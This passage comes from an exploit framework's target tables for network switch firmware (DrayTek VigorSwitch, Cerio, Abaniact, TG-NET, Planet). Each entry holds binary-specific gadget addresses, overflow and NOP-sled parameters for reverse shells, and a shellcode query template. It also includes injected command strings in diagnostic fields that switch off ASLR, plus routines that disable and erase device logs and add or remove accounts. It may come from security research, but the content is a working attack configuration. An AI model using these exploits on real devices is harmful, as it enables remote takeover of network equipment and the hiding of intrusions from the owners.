False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': { #\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_global_set()\r\n\t\t\t\t\t\t'log_settings_set':0x413AEC,\t# Jump one after 'sw $ra'\t\t\t# Disable Logging (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()\r\n\t\t\t\t\t\t'log_ramClear':0x413A14,\t\t# Jump one after 'sw $ra'\t\t\t# Clean RAM log (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()\r\n\t\t\t\t\t\t'log_fileClear':0x413A14,\t\t# Jump one after 'sw $ra'\t\t\t# Clean FILE log (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()\r\n\t\t\t\t\t\t'sys_timeSntp_set':0x4108E4,\t# Jump one after 'sw $ra'\t\t\t# Set SNTP Server (Inject RCE)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()\r\n\t\t\t\t\t\t'sys_timeSntpDel_set':0x4108E4,\t# Jump one after 'sw $ra'\t\t\t# Delete (address, binary dependent) \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()\r\n\t\t\t\t\t\t'sys_timeSettings_set':0x4108E4,# Jump one after 'sw $ra'\t\t\t# Enable/Disable (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'cgi':'set.cgi',\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()\r\n\t\t\t\t\t\t'START':0x7ffeff04,\t\t\t\t# start: Stack overflow RA, used for searching NOP sled by blind jump\r\n\t\t\t\t\t\t'STOP':0x7fc60000,\t\t\t\t# end: You may want to play with this if you dont get it working\r\n\t\t\t\t\t\t'usr_nop': 64,\t\t\t\t\t# NOP sled (shellcode will be tailed)\r\n\t\t\t\t\t\t'pwd_nop': 77,\t\t\t\t\t# filler/garbage (not used for something constructive)\r\n\t\t\t\t\t\t'align': 3,\t\t\t\t\t\t# Align opcodes in memory\r\n\t\t\t\t\t\t'stack':True,\t\t\t\t\t# NOP and shellcode lays on: True = stack, False = Heap\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t#\r\n\t\t\t# Draytek\r\n\t\t\t#\r\n\t\t\t# CGI Reverse Shell : Yes\r\n\t\t\t# Boa/Hydra reverse shell: No (cannot point JMP correct into NOP on heap)\r\n\t\t\t# Del /var/log/ram.log : Yes\r\n\t\t\t# Del /var/log/flash.log : Yes\r\n\t\t\t# Del /mntlog/flash.log : Yes\r\n\t\t\t# Add credentials : Yes\r\n\t\t\t# Del credentials : Yes\r\n\t\t\t#\r\n\t\t\t'752-95168': {\r\n\t\t\t\t'template':'DrayTek',\t\t\t\t\t# Static for the vendor\r\n\t\t\t\t'version':'2.1.4',\t\t\t\t\t\t# Version / binary dependent stuff\r\n\t\t\t\t'model':'VigorSwitch P1100', \t\t\t#\r\n\t\t\t\t'uri':'https://www.draytek.com/products/vigorswitch-p1100/',\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; embedparse() \r\n\t\t\t\t\t\t'gadget': 0x40C67C,\t\t\t\t# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'system': 0x8f99852c,\t\t\t# la $t9, system # opcode, binary dependent\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'handler': 0x248490ac,\t\t\t# addiu $a0, (.ascii \"handler -c boa &\" - 0x430000) # (opcode, binary dependent)\r\n\t\t\t\t\t\t'v0': 7,\t\t\t\t\t\t# Should leave as-is (but you can play between 5 - 8)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': { #\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_global_set()\r\n\t\t\t\t\t\t'log_settings_set':0x413E34,\t# Jump one after 'sw $ra'\t\t\t# Disable Logging (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()\r\n\t\t\t\t\t\t'log_ramClear':0x413D64,\t\t# Jump one after 'sw $ra'\t\t\t# Clean RAM log (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()\r\n\t\t\t\t\t\t'log_fileClear':0x413D64,\t\t# Jump one after 'sw $ra'\t\t\t# Clean FILE log (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()\r\n\t\t\t\t\t\t'sys_timeSntp_set':0x410CA8,\t# Jump one after 'sw $ra'\t\t\t# Set SNTP Server (Inject RCE)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()\r\n\t\t\t\t\t\t'sys_timeSntpDel_set':0x410CA8,\t# Jump one after 'sw $ra'\t\t\t# Delete (address, binary dependent) \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()\r\n\t\t\t\t\t\t'sys_timeSettings_set':0x410CA8,# Jump one after 'sw $ra'\t\t\t# Enable/Disable (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\t\t\t\t# \r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'cgi':'set.cgi',\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()\r\n\t\t\t\t\t\t'START':0x7ffeff04,\t\t\t\t# start: Stack overflow RA, used for searching NOP sled by blind jump\r\n\t\t\t\t\t\t'STOP':0x7fc60000,\t\t\t\t# end: You may want to play with this if you dont get it working\r\n\t\t\t\t\t\t'usr_nop': 64,\t\t\t\t\t# NOP sled (shellcode will be tailed)\r\n\t\t\t\t\t\t'pwd_nop': 77,\t\t\t\t\t# filler/garbage (not used for something constructive)\r\n\t\t\t\t\t\t'align': 3,\t\t\t\t\t\t# Align opcodes in memory\r\n\t\t\t\t\t\t'stack':True,\t\t\t\t\t# NOP and shellcode lays on: True = stack, False = Heap\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t#\r\n\t\t\t# Cerio\r\n\t\t\t#\r\n\t\t\t# CGI Reverse Shell : Yes\r\n\t\t\t# Boa/Hydra reverse shell: Yes\r\n\t\t\t# Del /var/log/ram.log : Yes\r\n\t\t\t# Del /var/log/flash.log : Yes\r\n\t\t\t# Del /mntlog/flash.log : Yes\r\n\t\t\t# Add credentials : Yes\r\n\t\t\t# Del credentials : Yes\r\n\t\t\t#\r\n\t\t\t'224-5061': {\r\n\t\t\t\t'template':'Cerio',\t\t\t\t\t# Static for the vendor\r\n\t\t\t\t'version':'1.00.29',\t\t\t\t# Version / binary dependent stuff\r\n\t\t\t\t'model':'CS-2424G-24P', \t\t\t#\r\n\t\t\t\t'uri':'https://www.cerio.com.tw/eng/switch/poe-switch/cs-2424g-24p/',\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; embedparse() \r\n\t\t\t\t\t\t'gadget': 0x40E6DC,\t\t\t\t# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'system': 0x8f998524,\t\t\t# la $t9, system # opcode, binary dependent\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'handler': 0x248411bc,\t\t\t# addiu $a0, (.ascii \"handler -c boa &\" - 0x430000) # (opcode, binary dependent)\r\n\t\t\t\t\t\t'v0': 7,\t\t\t\t\t\t# Should leave as-is (but you can play between 5 - 8)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': { #\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_diag_traceroute_set()\r\n\t\t\t\t\t\t'sys_ping_post_cmd':'&srvHost=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/check;&count=1',\r\n\t\t\t\t\t\t'sys_ping_post_check':'',\r\n\t\t\t\t\t\t'web_sys_ping_post':0x40E114,\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\t\t\t\t# \r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_global_set()\r\n\t\t\t\t\t\t'log_settings_set':0x41DB4C,\t# Jump one after 'sw $ra'\t\t\t# Disable Logging (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()\r\n\t\t\t\t\t\t'log_ramClear':0x41DA94,\t\t# Jump one after 'sw $ra'\t\t\t# Clean RAM log (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()\r\n\t\t\t\t\t\t'log_fileClear':0x41DA94,\t\t# Jump one after 'sw $ra'\t\t\t# Clean FILE log (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()\r\n\t\t\t\t\t\t'sys_timeSntp_set':0x415F14,\t# Jump one after 'sw $ra'\t\t\t# Set SNTP Server (Inject RCE)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()\r\n\t\t\t\t\t\t'sys_timeSntpDel_set':0x415F14,\t# Jump one after 'sw $ra'\t\t\t# Delete (address, binary dependent) \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()\r\n\t\t\t\t\t\t'sys_timeSettings_set':0x415F14,# Jump one after 'sw $ra'\t\t\t# Enable/Disable (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': False,\t\t\t# \r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'cgi':'set.cgi',\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()\r\n\t\t\t\t\t\t'START':0x7ffeff04,\t\t\t\t# start: Stack overflow RA, used for searching NOP sled by blind jump\r\n\t\t\t\t\t\t'STOP':0x7fc60000,\t\t\t\t# end: You may want to play with this if you dont get it working\r\n\t\t\t\t\t\t'usr_nop': 64,\t\t\t\t\t# NOP sled (shellcode will be tailed)\r\n\t\t\t\t\t\t'pwd_nop': 77,\t\t\t\t\t# filler/garbage (not used for something constructive)\r\n\t\t\t\t\t\t'align': 3,\t\t\t\t\t\t# Align opcodes in memory\r\n\t\t\t\t\t\t'stack':True,\t\t\t\t\t# NOP and shellcode lays on: True = stack, False = Heap\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t#\r\n\t\t\t# Abaniact\r\n\t\t\t#\r\n\t\t\t# CGI Reverse Shell : Yes\r\n\t\t\t# Boa/Hydra reverse shell: Yes\r\n\t\t\t# Del /var/log/ram.log : Yes\r\n\t\t\t# Del /var/log/flash.log : No\r\n\t\t\t# Del /mntlog/flash.log : No\r\n\t\t\t# Add credentials : Yes\r\n\t\t\t# Del credentials : Yes\r\n\t\t\t#\r\n\t\t\t'222-45866': {\r\n\t\t\t\t'template':'Abaniact',\t\t\t\t\t# Static for the vendor\r\n\t\t\t\t'version':'116B00033',\t\t\t\t# Version / binary dependent stuff\r\n\t\t\t\t'model':'AML2-PS16-17GP L2',\t\t\t# Model\r\n\t\t\t\t'uri':'https://www.abaniact.com/L2SW/',\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; embedparse() \r\n\t\t\t\t\t\t'gadget': 0x40E65C,\t\t\t\t# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'system': 0x8f998524,\t\t\t# la $t9, system) # opcode, binary dependent\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'handler': 0x2484152c,\t\t\t# addiu $a0, (.ascii \"handler -c boa &\" - 0x430000) # (opcode, binary dependent)\r\n\t\t\t\t\t\t'v0': 7,\t\t\t\t\t\t# Should leave as-is (but you can play between 5 - 8)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': { #\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t# Ping IPv4\r\n\t\t\t\t\t\t#'sys_ping_post_cmd':'ip=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space&count=1',\r\n\t\t\t\t\t\t#'verify_uri':'/tmp/pingtest_tmp',\r\n\t\t\t\t\t\t#'web_sys_ping_post':0x4296FC,\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_ping_post()\r\n\r\n\t\t\t\t\t\t# traceroute\r\n\t\t\t\t\t\t'web_sys_ping_post':0x429F58,\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_trace_route_post()\r\n\t\t\t\t\t\t'sys_ping_post_cmd':'ip=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/traceroute_tmp #&tr_maxhop=30&count=1',\r\n\t\t\t\t\t\t'verify_uri':'/tmp/traceroute_tmp',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_setting_post()\r\n\t\t\t\t\t\t'log_settings_set':0x4B4FE4,\t# Jump one after 'sw $ra'\t\t\t# Disable Logging (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_file_del()\r\n\t\t\t\t\t\t'log_ramClear':0x4BA5D0,\t\t# Jump one after 'sw $ra'\t\t\t# Clean RAM log (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_file_del()\r\n\t\t\t\t\t\t'log_fileClear':0x4BA5D0,\t\t# Jump one after 'sw $ra'\t\t\t# Clean FILE log (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t'sys_timeSntp_set':0x43764C,\t# Jump one after 'sw $ra'\t\t\t# Set SNTP Server (Inject CMD)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()\r\n\t\t\t\t\t\t'sys_timeSntpDel_set':0x43764C,\t# Jump one after 'sw $ra'\t\t\t# Delete (address, binary dependent) \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()\r\n\t\t\t\t\t\t'sys_timeSettings_set':0x431CC4,# Jump one after 'sw $ra'\t\t\t# Enable/Disable (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'cgi':'dispatcher.cgi',\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; main()\r\n\t\t\t\t\t\t'query':'username=admin&password=_PWDNOP_RA_START&login=1&shellcod=_USRNOP_USRNOP_USRNOP_SHELLCODE',\r\n\t\t\t\t\t\t'START':0x7ffe6e04,\t\t\t\t# start: Stack overflow RA, used for searching NOP sled by blind jump\r\n\t\t\t\t\t\t'STOP':0x7fc60000,\t\t\t\t# end: You may want to play with this if you dont get it working\r\n\t\t\t\t\t\t'stack':True,\t\t\t\t\t# NOP and shellcode lays on: True = stack, False = Heap\r\n\t\t\t\t\t\t'usr_nop': 53,\t\t\t\t\t# NOP sled (shellcode will be tailed)\r\n\t\t\t\t\t\t'pwd_nop': 45,\t\t\t\t\t# filler/garbage (not used for something constructive)\r\n\t\t\t\t\t\t'align': 0,\t\t\t\t\t\t# Align opcodes in memory\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'workaround':True,\t# My LAB workaround\r\n\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t#\r\n\t\t\t# TG-NET Botone Technology Co.,Ltd.\r\n\t\t\t# (Traces in this image: 3One Data Communication, Saitian, Sangfor, Sundray, Gigamedia, GetCK, Hanming Technology)\r\n\t\t\t#\r\n\t\t\t# CGI Reverse Shell : Yes\r\n\t\t\t# Boa/Hydra reverse shell: Yes\r\n\t\t\t# Del /var/log/ram.log : Yes\r\n\t\t\t# Del /var/log/flash.log : No\r\n\t\t\t# Del /mntlog/flash.log : No\r\n\t\t\t# Add credentials : Yes\r\n\t\t\t# Del credentials : Yes\r\n\t\t\t#\r\n\t\t\t'222-81176': {\r\n\t\t\t\t'template':'TG-NET',\t\t\t\t\t# Static for the vendor\r\n\t\t\t\t'version':'3.1.1-R1',\t\t\t\t\t# Version / binary dependent stuff\r\n\t\t\t\t'model':'P3026M-24POE (V3)',\t\t\t\t# Model\r\n\t\t\t\t'uri':'http://www.tg-net.net/productshow.asp?ProdNum=1049&parentid=98',\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; embedparse() \r\n\t\t\t\t\t\t'gadget': 0x40C74C,\t\t\t\t# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'system': 0x8f99851c,\t\t\t# la $t9, system) # opcode, binary dependent\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'handler': 0x2484a2d4,\t\t\t# addiu $a0, (.ascii \"handler -c boa &\" - 0x430000) # (opcode, binary dependent)\r\n\t\t\t\t\t\t'v0': 7,\t\t\t\t\t\t# Should leave as-is (but you can play between 5 - 8)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': { #\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_setting_post()\r\n\t\t\t\t\t\t'log_settings_set':0x46AC10,\t# Jump one after 'sw $ra'\t\t\t# Disable Logging (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_file_del()\r\n\t\t\t\t\t\t'log_ramClear':0x46E368,\t\t# Jump one after 'sw $ra'\t\t\t# Clean RAM log (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_file_del()\r\n\t\t\t\t\t\t'log_fileClear':0x46E368,\t\t# Jump one after 'sw $ra'\t\t\t# Clean FILE log (address, binary dependent)\r\n\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()\r\n\t\t\t\t\t\t'sys_timeSntp_set':0x42243C,\t# Jump one after 'sw $ra'\t\t\t# Set SNTP Server (Inject CMD)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()\r\n\t\t\t\t\t\t'sys_timeSntpDel_set':0x42243C,\t# Jump one after 'sw $ra'\t\t\t# Delete (address, binary dependent) \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()\r\n\t\t\t\t\t\t'sys_timeSettings_set':0x424DE0,# Jump one after 'sw $ra'\t\t\t# Enable/Disable (address, binary dependent)\r\n\r\n\t\t\t\t\t\t'vulnerable':False,\r\n\t\t\t\t\t}, \r\n\r\n\t\t\t\t\t# Interesting when there is a fresh heap with 0x00's (4 x 0x00 == MIPS NOP),\r\n\t\t\t\t\t# and to fill wider area with sending '&%8f%84%01=%8f%84%80%18' where:\r\n\t\t\t\t\t# \r\n\t\t\t\t\t# NOP's\r\n\t\t\t\t\t# '24%04%FF=' : '=' will be replaced with 0x00, li $a0, 0xFFFFFF00\r\n\t\t\t\t\t# '%24%04%FF%FF' : li $a0, 0xFFFFFFFF\r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'cgi':'dispatcher.cgi',\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; main()\r\n\t\t\t\t\t\t'query':'username='+ self.random_string(112) +'_RA_START&password='+ self.random_string(80) +'&login=1'+ ('&%24%04%FF=%24%04%FF%FF' * 50) +'_SHELLCODE',\r\n\t\t\t\t\t\t'START':0x10010104,\t\t\t\t# start: Stack overflow RA, used for searching NOP sled by blind jump\r\n\t\t\t\t\t\t'STOP' :0x10600604,\t\t\t\t# end: You may want to play with this if you dont get it working\r\n\t\t\t\t\t\t'usr_nop': 28,\t\t\t\t\t# NOP sled (shellcode will be tailed)\r\n\t\t\t\t\t\t'pwd_nop': 20,\t\t\t\t\t# filler/garbage (not used for something constructive)\r\n\t\t\t\t\t\t'align': 0,\t\t\t\t\t\t# Align opcodes in memory\r\n\t\t\t\t\t\t'stack':False,\t\t\t\t\t# NOP and shellcode lays on: True = stack, False = Heap\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t}\r\n\r\n\t\t#\r\n\t\t# Vendor templates, Vendor_ETag() will be merged to here\r\n\t\t# (dont delete anything here thats not moved to Vendor_ETag())\r\n\t\t#\r\n\r\n\t\tVendor_Template = {\r\n\t\t\t#\r\n\t\t\t'Planet': {\r\n\t\t\t\t'vendor': 'PLANET Technology Corp.',\r\n\t\t\t\t'modulus_uri':'',\r\n\t\t\t\t'info_leak':False,\r\n\t\t\t\t'info_leak_JSON':False,\r\n\t\t\t\t'info_leak_uri':'',\r\n\t\t\t\t'xsid':False,\r\n\t\t\t\t'xsid_uri':'',\r\n\t\t\t\t'login': {\r\n\t\t\t\t\t'description':'Login/Logout on remote device',\r\n\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t'json':False,\r\n\t\t\t\t\t'encryption':'clear',\r\n\t\t\t\t\t'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t'query':'username=USERNAME&password=PASSWORD&login=1',\r\n\t\t\t\t\t'status_uri':'/cgi-bin/dispatcher.cgi?cmd=547',\r\n\t\t\t\t\t'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',\r\n\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t'log':{\r\n\t\t\t\t\t\t'description':'Disable and clean logs',\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'json':False,\r\n\t\t\t\t\t\t'disable_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'disable_query':'LOGGING_SERVICE=0&cmd=5121',\r\n\t\t\t\t\t\t'status':'',\r\n\t\t\t\t\t\t'clean_logfile_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'clean_logfile_query':'cmd_5132=Clear+file+messages',\r\n\t\t\t\t\t\t'clean_logmem_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'clean_logmem_query':'cmd_5132=Clear+buffered+messages',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t# Verify lacking authentication\r\n\t\t\t\t'verify': {\r\n\t\t\t\t\t\t'httpuploadbakcfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload \"backup-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpuploadbakcfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':' Invalid config file!!', # one 0x20 in beginning\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpuploadruncfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/update \"running-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':' Invalid config file!!', # one 0x20 in beginning\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httprestorecfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': 